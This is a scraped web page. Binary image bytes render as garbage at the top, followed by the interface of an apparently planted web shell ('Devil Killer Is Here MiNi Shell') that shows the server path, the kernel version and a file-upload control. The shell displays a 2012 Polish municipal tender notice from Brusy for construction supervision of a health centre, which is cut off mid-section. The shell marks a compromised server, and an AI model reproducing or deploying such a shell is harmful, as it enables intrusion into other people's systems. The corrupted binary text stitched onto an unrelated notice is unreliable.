JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120924/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120924/203969-N-2012.html

<p class="kh_header"><b>Brusy: Pełnienie obowiązków inspektora nadzoru inwestorskiego nad realizacją projektu pn.: Podniesienie jakości świadczonych usług medycznych poprzez przebudowę i rozbudowę ośrodka zdrowia w Brusach wraz z wyposażeniem finansowanego w ramach Regionalnego Programu Operacyjnego dla Województwa Pomorskiego na lata 2007-2013, Osi priorytetowej 9. Lokalna infrastruktura społeczna i inicjatywy obywatelskie, Działanie 9.2 Lokalna infrastruktura ochrony zdrowia objętego  Europejskim Funduszem Rozwoju Regionalnego</b><br>
<b>Numer ogłoszenia: 203969 - 2012; data zamieszczenia: 24.09.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Brusy , ul. Na Zaborach 1, 89-632 Brusy, woj. pomorskie, tel. (052) 3969302, faks (052) 3969303.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.brusy.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienie obowiązków inspektora nadzoru inwestorskiego nad realizacją projektu pn.: Podniesienie jakości świadczonych usług medycznych poprzez przebudowę i rozbudowę ośrodka zdrowia w Brusach wraz z wyposażeniem finansowanego w ramach Regionalnego Programu Operacyjnego dla Województwa Pomorskiego na lata 2007-2013, Osi priorytetowej 9. Lokalna infrastruktura społeczna i inicjatywy obywatelskie, Działanie 9.2 Lokalna infrastruktura ochrony zdrowia objętego  Europejskim Funduszem Rozwoju Regionalnego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest Pełnienie obowiązków inspektora nadzoru inwestorskiego nad realizacją projektu pn.: Podniesienie jakości świadczonych usług medycznych poprzez przebudowę i rozbudowę ośrodka zdrowia w Brusach wraz z wyposażeniem finansowanego w ramach Regionalnego Programu Operacyjnego dla Województwa Pomorskiego na lata 2007-2013, Osi priorytetowej 9. Lokalna infrastruktura społeczna i inicjatywy obywatelskie, Działanie 9.2 Lokalna infrastruktura ochrony zdrowia objętego  Europejskim Funduszem Rozwoju Regionalnego.
2.	Zakres nadzorowanych prac obejmuje:
a)	przebudowę części istniejącej budynku polegającą na: zmianie układu oraz funkcji pomieszczeń w piwnicy, na parterze, i I piętrze; adaptacji poddasza z wydzieleniem nowych pomieszczeń użytkowych; likwidacji schodów wewnętrznych; wymianie części stolarki drzwiowej i okiennej oraz montażu nowej; wymianie części istniejących instalacji wewnętrznych i montażu nowych; malowaniu elewacji oraz częściowej zmianie licowego materiału wykończeniowego,
b) 	rozbudowę budynku polegającą na: budowie nowego skrzydła o dwóch pełnych kondygnacjach nadziemnych z użytkowym poddaszem bez podpiwniczenia.
Przebudowa i rozbudowa obejmują pełen zakres robót budowlanych ziemnych, fundamentowych murarskich, instalacyjnych oraz wykończeniowych.
c) roboty rozbiórkowe obejmujące: rozbiórkę piętrowego budynku gospodarczego; rozbiórkę parterowego budynku przychodni oraz parterowej przybudówki 
  w budynku dwukondygnacyjnym; likwidację ogrodzenia od strony ulic Dworcowej oraz Nad Dworcem 
d) wykonanie wewnętrznych instalacji sanitarnych, w tym: instalacji zimnej i ciepłej wody użytkowej z układem cyrkulacji; instalacji centralnego ogrzewania wraz z kotłownią; instalacji kanalizacyjnej; instalacji wentylacji mechanicznej,
e)	wykonanie instalacji elektrycznych, w tym: instalacji oświetlenia podstawowego; instalacji oświetlenia ewakuacyjnego; instalacji lamp bakteriobójczych; instalacji gniazd wtyczkowych 1 - fazowych; instalacji elektrycznych urządzeń medycznych; instalacji elektrycznej wentylacji mechanicznej; instalacji elektrycznej windy; instalacji elektrycznej podestu dla niepełnosprawnych; instalacji przeciwporażeniowej i przeciwprzepięciowej; instalacji podświetlenia i oświetlenia zewnętrznego; instalacji odgromowej,
f) 	zagospodarowania terenu, w tym wykonanie: utwardzenia wokół budynku wraz z terenem biologicznie czynnym w postaci  trawników z zielenią urządzoną; placu manewrowego dla pojazdów zaopatrzenia przychodni wraz z dwoma miejscami parkingowymi dla osób niepełnosprawnych; ogrodzenia od strony zachodniej.
3.	Do zakresu obowiązków Wykonawcy należy:
1)	Sprawdzenie spójności dokumentacji projektowej (w tym projektów budowlanych, Specyfikacji Technicznych) oraz kosztorysów ofertowych;
2)	Zarządzanie realizacją postanowień umowy zawartej z wykonawcą robót                         budowlanych;
3)	Wyznaczenie inspektorów posiadających uprawnienia do kierowania robotami budowlanymi w wymaganych specjalnościach: 
a)	konstrukcyjno - budowlanej;
b)	instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych wodociągowych i kanalizacyjnych; 
c)	instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych;
	lub posiadających ważne uprawnienia budowlane do kierowania robotami budowlanymi, które zostały wydane na podstawie wcześniej obowiązujących przepisów, lub w odniesieniu do obywateli państw członkowskich, posiadających odpowiednie, równoważne kwalifikacje zawodowe do wykonywania działalności w budownictwie równoznacznej wykonywaniu samodzielnych funkcji technicznych w budownictwie na terytorium Rzeczypospolitej Polskiej, odpowiadające swoim zakresem uprawnieniom budowlanym, o których mowa w ustawie Prawo budowlane oraz specjalistę ds. rozliczeń,
4)	Wyznaczenie osoby pełniącej funkcję inspektora koordynatora zespołu specjalistów Inspektora Nadzoru poszczególnych specjalności;
5)	Bytność Inspektora koordynatora nadzoru zespołu specjalistów Inspektora Nadzoru na placu budowy nie rzadziej jak 1 raz w tygodniu w okresie prowadzenia robót budowlanych. W przypadku takiej niemożliwości Inspektor Nadzoru zobowiązany jest wyznaczyć ze swojego personelu zastępcę o równoważnych kwalifikacjach i doświadczeniu;
6)	Bytność pozostałych inspektorów nadzoru stanowiących zespół specjalistów Inspektora Nadzoru na placu budowy w trakcie trwania robót danej branży w takich odstępach czasu, aby była zapewniona skuteczność nadzoru;
7)	Przygotowanie zawiadomienia do organu nadzoru budowlanego o terminie rozpoczęcia robót, z załączeniem oświadczeń kierownika budowy kierowników robót poszczególnych branż oraz inspektorów nadzoru, potwierdzających przyjęcie obowiązków na budowie,
8)	Zarządzanie procesami tak, by zapewnić terminową realizację robót zgodnie z umową na realizację robót budowlanych; 
9)	Organizowanie i prowadzenie narad koordynacyjnych minimum 1 raz na dwa tygodnie;
10)	Sprawowanie kontroli zgodności realizowania robót z dokumentacją projektową, pozwoleniami na budowę, zgłoszeniami robót budowlanych nie wymagających pozwolenia na budowę, obowiązującymi przepisami i Polskimi Normami oraz zasadami wiedzy technicznej;
11)	Sprawdzanie jakości, ilości i technologii wykonawstwa robót oraz zastosowanych wyrobów budowlanych (materiałów) i urządzeń z uwzględnieniem kontroli materiałów dopuszczonych do stosowania w budownictwie i zapobieganie zastosowaniu materiałów wadliwych i nie dopuszczonych do obrotu i stosowania. Szczegółowa kontrola prowadzona jest przy pomocy zespołu inspektorów nadzoru inwestorskiego poszczególnych specjalności;
12)	Uczestniczenie w próbach i odbiorach technicznych, sprawdzanie, opiniowanie                                       przekazywanie do zatwierdzenia Zamawiającemu protokołów wykonanych i odebranych robót;
13)	Uczestniczenie w odbiorach robót zanikających i częściowych, odbiorze końcowym oraz przyjmowanie od wykonawców wszelkich dokumentów wymaganych w terminie odbioru (w tym sprawdzenie kompletności dokumentów, atestów, aprobat technicznych, protokołów pomiarów, DTR, instrukcji obsługi zainstalowanych urządzeń i systemów, geodezyjnej inwentaryzacji powykonawczej obiektów i ich części oraz innych), niezbędnych do odbioru końcowego całego zadania; 
14)	Kontrola nadzorowanych przez siebie robót w zakresie przestrzegania przepisów i zasad bezpiecznych warunków pracy;
15)	Kontrola prawidłowości zafakturowania wykonanych robót,  potwierdzenie faktycznie                                                       wykonanych robót oraz usunięcie wad także na żądanie Zamawiającego, kontrolowanie rozliczeń budowy;
16)	Wydawanie kierownikowi budowy poleceń potwierdzonych wpisem do dziennika budowy, dotyczących realizowanego zadania;
17)	Wstrzymanie robót budowlanych w przypadku, gdyby ich kontynuacja mogła               wywołać zagrożenia bądź spowodować niedopuszczalną niezgodność z projektem                        lub pozwoleniem na budowę;
18)	Potwierdzanie swojej bytności na budowie zapisem w dzienniku budowy i dokonywanie wpisów stwierdzających wszystkie okoliczności mające znaczenie dla oceny właściwego wykonywania robót;
19)	Rozstrzyganie, w porozumieniu z kierownikiem budowy, wątpliwości natury                 technicznej, powstałych w toku wykonywania robót;
20)	Uczestniczenie w pracach komisji, powoływanych do oceny lub rozstrzygania                technicznych spraw budowy w toku jej realizacji;
21)	Informowanie Zamawiającego o wszelkich ustaleniach dotyczących przebiegu 
i zaawansowania robót oraz przekazywanie informacji o istotnych zdarzeniach, jakie miały miejsce na terenie budowy, podjętych działaniach oraz o ewentualnych zagrożeniach mogących mieć wpływ na terminy realizacji robót;
22)	Potwierdzanie w dzienniku budowy zapisu kierownika budowy o gotowości robót do odbioru po zakończeniu robót oraz po wykonaniu przewidzianych w odrębnych przepisach i umowie prób i sprawdzeń oraz należytego urządzenia i uporządkowania placu budowy;
23)	Przystąpienie do odbioru robót w terminie do 7 dni od zgłoszenia przez                                                Wykonawcę robót budowlanych gotowości do odbioru robót zanikających i ulegających zakryciu;
24)	Sprawdzanie faktur, rachunków i innych dokumentów rozliczeniowych pod względem merytorycznym i rachunkowym wystawianych Zamawiającemu, tak by zachować całkowitą zgodność z wymogami Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego dla Województwa Pomorskiego na lata 2007-2013 a także z innymi obowiązującymi w tym zakresie przepisami prawa oraz zasadami rozliczeń ustalonymi przez Zamawiającego;
25)	Uczestniczenie w odbiorze ostatecznym obiektów po upływie okresu gwarancji ustalonego w umowie z Wykonawcą. Inspektor Nadzoru będzie także uczestniczył w przeglądach gwarancyjnych i nadzorował usuwanie stwierdzonych protokolarnie wad i usterek,
26)	Wykonanie czynności odnoszących się do realizacji uprawnień z tytułu rękojmi 
za wady wykonanych robót;
27)	W razie zaistnienia robót zamiennych lub dodatkowych zgłoszenie konieczności wykonania tych robót i przedstawienie zgodnie z przepisami prawa uzasadnienia, a po uzyskaniu akceptacji Zamawiającego, dokonanie uzgodnień z autorem projektu w zakresie wykonania dokumentacji zamiennej lub niezbędnej dokumentacji na roboty dodatkowe;
28)	Po końcowym dokonaniu odbioru robót, przyjęcie od kierownika budowy                            dokumentacji powykonawczej, dziennika budowy oraz przekazanie ich                          Zamawiającemu;
29)	Przygotowanie wniosków do organów nadzoru budowlanego wraz z niezbędnymi załącznikami o uzyskanie decyzji o pozwoleniu na użytkowanie obiektu;
30)	Całkowite końcowe rozliczenie rzeczowe i finansowe projektu zgodnie z umową               
o dofinansowanie w ramach Regionalnego Programu Operacyjnego dla Województwa Pomorskiego na lata 2007-2013, Osi priorytetowej 9. Lokalna infrastruktura społeczna i inicjatywy obywatelskie, Działanie 9.2 Lokalna infrastruktura ochrony zdrowia finansowanego z Europejskiego Funduszu Rozwoju Regionalnego i ustalonymi zasadami rozliczania inwestycji wraz z przygotowaniem końcowego wniosku o płatność;
31)	Przygotowanie, w uzgodnieniu z Wykonawcą robót budowlanych, dokumentów związanych z przejęciem środka trwałego z podziałem na obiekty inwentarzowe zgodnie z klasyfikacją środków trwałych..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.00.00.00-8, 71.54.00.00-5, 71.52.00.00-9, 71.53.00.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 20.06.2014.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający żąda, aby Wykonawcy a)	posiadali doświadczenie w nadzorowaniu robót i wykazali, że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeśli okres prowadzenia działalności jest krótszy - w tym okresie, sprawowali obowiązki Inspektora Nadzoru Inwestorskiego (lub Inżyniera Kontraktu lub Inwestora Zastępczego) na minimum jednym zadaniu dot. robót budowlanych polegających na budowie, rozbudowie lub przebudowie ogólnodostępnego obiektu kulturalnego, budynku o charakterze edukacyjnym, budynku szpitala, budynku zakładu opieki medycznej, budynku kultury fizycznej oznaczonych w Rozporządzeniu Rady Ministrów z 30 grudnia 1999 r. w sprawie Polskiej Klasyfikacji Obiektów Budowlanych (PKOB) (Dz. U. z 1999 r. nr 112, poz. 1316 z późn. zm.) o wartości min. 2,5 mln zł. brutto;   
b)	posiadali doświadczenie w rozliczaniu środków finansowych pochodzących ze źródeł zewnętrznych i wykazali, że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeśli okres prowadzenia działalności jest krótszy - w tym okresie, dokonali rozliczenia środków pozyskanych na realizację minimum jednego zadania dot. budowy, rozbudowy lub przebudowy ogólnodostępnego obiektu kulturalnego, budynku o charakterze edukacyjnym, budynku szpitala, budynku zakładu opieki medycznej, budynku kultury fizycznej oznaczonych w Rozporządzeniu Rady Ministrów z 30 grudnia 1999 r. w sprawie Polskiej Klasyfikacji Obiektów Budowlanych (PKOB) (Dz. U. z 1999 r. nr 112, poz. 1316 z późn. zm.)
Ocena spełnienia tego warunku zostanie dokonana na podstawie Wykazów usług złożonych przez Wykonawców na zasadzie spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiajacy żąda aby wykonawcy dysponowali osobami zdolnymi do wykonywania zamówienia tj. 
a)	Inspektorem koordynatorem wchodzącym w skład zespołu specjalistów Inspektora Nadzoru Inwestorskiego poszczególnych specjalności posiadającym co najmniej 5-letnie doświadczenie zawodowe w kierowaniu zespołem ludzi prowadzącym nadzór nad inwestycjami budowlanymi, pełniącym co najmniej 1 raz funkcję Inspektora koordynatora przy realizacji zakończonej inwestycji budowlanej realizowanej z udziałem środków finansowych pochodzących ze źródeł zewnętrznych, 
b)	Inspektorem nadzoru w specjalności konstrukcyjno-budowlanej, posiadającym odpowiednie wykształcenie techniczne oraz uprawnienia budowlane do sprawowania samodzielnych funkcji technicznych w budownictwie w specjalności konstrukcyjno -  budowlanej lub ważne uprawnienia budowlane do kierowania robotami budowlanymi, które zostały wydane na podstawie wcześniej obowiązujących przepisów oraz członkowstwo w Okręgowej Izbie Inżynierów Budownictwa, lub w odniesieniu do obywateli państw członkowskich, posiadających odpowiednie, równoważne kwalifikacje zawodowe do wykonywania działalności w budownictwie równoznacznej wykonywaniu samodzielnych funkcji technicznych w budownictwie na terytorium Rzeczypospolitej Polskiej, odpowiadające swoim zakresem uprawnieniom budowlanym, o których mowa w ustawie Prawo budowlane, oraz co najmniej 5 letnie doświadczenie zawodowe w nadzorowaniu robót budowlanych;
c)	Inspektorem nadzoru w specjalności sanitarnej posiadającym odpowiednie wykształcenie techniczne oraz uprawnienia budowlane do sprawowania samodzielnych funkcji technicznych w budownictwie w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych wodociągowych i kanalizacyjnych lub ważne uprawnienia budowlane do kierowania robotami budowlanymi w ww. zakresie, które zostały wydane na podstawie wcześniej obowiązujących przepisów oraz członkowstwo w Okręgowej Izbie Inżynierów Budownictwa lub w odniesieniu do obywateli państw członkowskich, posiadających odpowiednie, równoważne kwalifikacje zawodowe do wykonywania działalności w budownictwie równoznacznej wykonywaniu samodzielnych funkcji technicznych w budownictwie na terytorium Rzeczypospolitej Polskiej, odpowiadające swoim zakresem uprawnieniom budowlanym, o których mowa w ustawie Prawo budowlane, oraz co najmniej 5 letnie doświadczenie zawodowe w nadzorowaniu robót budowlanych; 
d)	Inspektorem nadzoru w specjalności elektrycznej posiadającym odpowiednie wykształcenie techniczne oraz uprawnienia budowlane do sprawowania samodzielnych funkcji technicznych w budownictwie w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych lub ważne uprawnienia budowlane do kierowania robotami budowlanymi w ww. zakresie, które zostały wydane na podstawie wcześniej obowiązujących przepisów oraz członkowstwo w Okręgowej Izbie Inżynierów Budownictwa lub w odniesieniu do obywateli państw członkowskich, posiadających odpowiednie, równoważne kwalifikacje zawodowe do wykonywania działalności w budownictwie równoznacznej wykonywaniu samodzielnych funkcji technicznych w budownictwie na terytorium Rzeczypospolitej Polskiej, odpowiadające swoim zakresem uprawnieniom budowlanym, o których mowa w ustawie Prawo budowlane, oraz co najmniej 5 letnie doświadczenie zawodowe w nadzorowaniu robót budowlanych;
e)	Specjalistą ds. rozliczenia środków finansowych pochodzących ze źródeł zewnętrznych posiadającym wykształcenie ekonomiczne oraz co najmniej 3 letnie doświadczenie zawodowe w rozliczeniu przynajmniej jednej zakończonej inwestycji realizowanej z udziałem środków finansowych pochodzących ze źródeł zewnętrznych. Ocena spełnienia tego warunku zostanie dokonana na podstawie Wykazu osób złożonego przez Wykonawców na zasadzie spełnia/nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. W przypadku polegania na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, pisemne zobowiązanie tych podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia; 2. Wypełniony formularz oferty - zgodny z wzorem stanowiącym Załącznik Nr 1 do SIWZ; 3. Pełnomocnictwo dla osoby podpisującej ofertę do występowania w imieniu Wykonawcy (wzór - Załącznik Nr 8 do SIWZ)</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Istotne zmiany w umowie, na skutek wystąpienia poniższych okoliczności mogą dotyczyć następujących elementów umowy:
1)	w zakresie zmiany terminu realizacji przedmiotu umowy, w przypadku:
a)	konieczności udzielenia zamówienia dodatkowego, nieobjętego zamówieniem
podstawowym, którego wykonanie stało się konieczne na skutek sytuacji niemożliwej wcześniej do przewidzenia, jeżeli:
- z przyczyn technicznych lub gospodarczych oddzielenie zamówienia dodatkowego od zamówienia podstawowego wymagałoby poniesienia niewspółmiernie wysokich kosztów;
- prawidłowe wykonanie zamówienia podstawowego jest uzależnione od wykonania zamówienia dodatkowego;
b)	konieczności wprowadzenia zmian w dokumentacji techniczno - projektowej co może
powodować brak możliwości dotrzymania pierwotnego terminu zakończenia realizacji zawartej umowy,
c)	przerw w realizacji robót budowlanych powstałych z przyczyn nie leżących 
po stronie Wykonawcy,
d)	konieczności uzyskania niemożliwych do przewidzenia na etapie planowania
inwestycji: danych, zgód lub pozwoleń osób trzecich lub właściwych organów,
e)	wstrzymania realizacji prac objętych umową, co uniemożliwia terminowe
zakończenie realizacji przedmiotu umowy,
f)	ustalenie innych warunków płatności;
g)	zmiany postanowień umowy o dofinansowanie przedmiotu zamówienia w ramach Regionalnego Programu Operacyjnego dla Województwa Pomorskiego na lata
 2007-2013.
2)	w zakresie zmiany terminów płatności, w przypadku:
a)	nieprzewidzianego braku płynności finansowej u Zamawiającego,
b)	zmiany w obowiązujących przepisach, jeżeli zgodnie z nimi konieczne będzie dostosowanie treści umowy do aktualnego stanu prawnego,
c)	wystąpienie różnego rodzaju klęsk żywiołowych, epidemii, operacji wojennych, strajku generalnego,
d)	zmiany postanowień umowy o dofinansowanie przedmiotu zamówienia w ramach Regionalnego Programu Operacyjnego dla Województwa Pomorskiego na lata
 2007-2013,
